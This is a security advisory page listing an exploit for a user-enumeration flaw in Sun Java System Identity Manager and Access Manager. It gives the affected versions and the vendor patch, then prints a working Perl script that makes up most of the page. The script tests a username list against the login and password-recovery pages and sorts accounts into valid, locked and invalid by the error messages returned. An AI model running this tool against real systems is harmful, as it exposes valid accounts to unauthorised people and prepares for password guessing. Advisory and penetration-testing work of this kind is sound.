‘Sun Java System Identiy Manager Users Enumeration’

Summary

The following exploit is a proof of concept for the enumerations of users vulnerability of Sun Java System Access Manager and Identity manager.’

Credit:

‘The information has been provided by Marco Mella.
The original article can be found at: http://www.webalice.it/marco.mella/AboutSecurity/AboutSecurity_Advisory/Entries/2009/4/2_Sun_Java_System_Identiy_Manager_Users_enumeration.html


Details

Vulnerable Systems:
 * Sun Java System Identity Manager version 7.0
 * Sun Java System Identity Manager version 7.1
 * Sun Java System Identity Manager version 7.1.1
 * Sun Java System Identity Manager version 8.0

An unprivileged (local and remote) user may be able to determinate the existence of valid UserId examining the error messages provided by Sun Java System Identity Manager.

Impact:
A security vulnerability in the Sun Java System Identity Manager allow an unprivileged user to determine the existence of UserID.

Vendor Solution:
23 Mar 2009 – The vendor has issued a patch SUNSolve Alert: http://sunsolve.sun.com/search/document.do?assetkey=1-66-253267-1

Exploit:
#!/usr/bin/perl -w
# POC: Sun Java Access Manager and Identity Manager Users Enumeration
# Developed for OWASP Testing guide V3
# Simple script for Sun Java access manager and Identity Manager users enumeration
#
# Author : Marco Mella <marco.mella <at> aboutsecurity.net>
# Site : www.aboutsecurity.net
#
# Copyright, 2008-2009 Marco Mella
# Sun Java System Access Manager and Sun Java System Identity Manager
# are trademarks or registered trademarks of Sun Microsystems, Inc.
#
# Last updated: 13 Jun 2008
#
use Getopt::Long;
use LWP::UserAgent;
use Switch;
$Userfile = ”;
$line=”;

my ($server, $user_file, $switch);
my $banner = ‘Author: Marco Mella <marco.mella <at> aboutsecurity.net>n’;
my $usage= ‘Usage:n $0 -server <ip_address|host> -port <tcp port> -userfile <filename> -switch<am|idm> nn’;

my $opt = GetOptions (
 ‘server=s’ => $Server,
 ‘port=s’ => $Port,
 ‘userfile=s’ => $Userfile,
 ‘switch=s’ => $Switch );
 
print ‘nnnn+———————————————————————————–+nn’;
print ‘ Sun Java Access Manager and Identity Manager User Enumeration n’;
print ‘ ‘.$banner.’n’;
print ‘+———————————————————————————–+nn’;

if ( !$Server || !$Userfile ||!$Port || !$Switch) {
 print $usage;
 
 exit(1);
 }
 
 
if ( $Switch eq ‘am’ ) {
 open(Userfile) or die(‘Could not open file: $Userfilenn’);
 print ‘Users enumeration Sun java System Access Managernn ‘;
 foreach $line (<Userfile>) {
 my $url = ‘https://’.$Server.’:’.$Port.’/amserver/UI/Login?user=’.$line;
 my $browser = LWP::UserAgent->new;

 my $response = $browser->get($url);
 my @headers = $response->header_field_names;
 #print ‘response headers: @headersn’;

 $response->is_success or
    die ‘Failed to GET ‘$url’: ‘, $response->status_line, ‘n Aborintg’;
     
 #print $response->as_string;
chomp($line);

# Analysis of response and title of web page received
 if(($response->content =~ m{This user is not active} ) || ($response->title =~ m{User Inactive})) {
# print $response->content;
# print ‘nnnn’;
# print $response->title;
    print ‘ntUser: $line not validnn’}
    
  elsif (($response->content =~ m{No configuration found} ) || ($response->title =~ m{No Configuration Error})) {
    print ‘ntUser: $line yeah … Active user! nn’}
    
   elsif ($response->content =~ m{Your account has been locked.} ) {
    print ‘ntUser: $line Exist but Account has been lockednn’}
  
  else {
     print ‘ntUser: $line Active ???? Maybe you have to analizing the error message received nn’}
  }
  print ‘nn’;
  close(Userfile);
 }

 if ( $Switch eq ‘idm’ ) {
 open(Userfile) or die(‘Could not open file: $Userfilenn’);
 print ‘Users enumeration Sun java System Identity Manager – Login Feature Analysisnn ‘;
 
 foreach $line (<Userfile>) {
 my $url = ‘https://’.$Server.’:’.$Port.’/idm/login.jsp?id=&command=login&activeControl=&accountId=’.$line.’&password=’;
 my $browser = LWP::UserAgent->new;

 my $response = $browser->get($url);
 my @headers = $response->header_field_names;
 my $title = $response->title;
 #print ‘response headers: @headersn’;

 $response->is_success or
    die ‘Failed to GET ‘$url’: ‘, $response->status_line, ‘n Aborintg’;
     
 #print $response->as_string;
 chomp($line);
 
# Analysis of response and title of web page received
 if($response->content =~ m{Invalid Account ID} ) {
# print $response->content;
# print ‘nnnn’;
# print $response->title;

    print ‘ntUser: $line not validnn’}
    
  elsif ($response->content =~ m{Invalid Password} ) {
    print ‘ntUser: $line yeah … Active user! nn’}
  
  elsif ($response->content =~ m{Your account has been locked.} ) {
    print ‘ntUser: $line Exist but Account has been lockednn’}
    
  else {
     print ‘ntUser: $line Active ???? Maybe you have to analizing the error message received nn’}
  }
  close(Userfile);
 }
 
 #IDM Recovery Feature
 #https://oiawf02:8081/idm/questionLogin.jsp?accountId=owasp&lang=en&cntry=US
 
 if ( $Switch eq ‘idm’ ) {
 open(Userfile) or die(‘Could not open file: $Userfilenn’);
 print ‘nnnnUsers enumeration Sun java System Identity Manager – Recovery Feature Analysisnn ‘;
 
 foreach $line (<Userfile>) {
 my $url = ‘https://’.$Server.’:’.$Port.’/idm/questionLogin.jsp?accountId=’.$line;
 my $browser = LWP::UserAgent->new;

 my $response = $browser->get($url);
 my @headers = $response->header_field_names;
 my $title = $response->title;
 #print ‘response headers: @headersn’;

 $response->is_success or
    die ‘Failed to GET ‘$url’: ‘, $response->status_line, ‘n Aborintg’;
     
 #print $response->as_string;
 chomp($line);
 
# Analysis of response and title of web page received
 if($response->content =~ m{The specified user was not found} ) {
# print $response->content;
# print ‘nnnn’;
# print $response->title;

    print ‘ntUser: $line not validnn’}
    
  elsif ($response->content =~ m{Too few user} ) {
    print ‘ntUser: $line yeah … Active user! nn’}
  
  elsif ($response->content =~ m{Your account has been locked.} ) {
    print ‘ntUser: $line Exist but Account has been lockednn’}
    
  else {
     print ‘ntUser: $line Active ???? Maybe you have to analizing the error message received nn’}
  }
  print ‘nn’;
  close(Userfile);
 }’

Categories: Exploits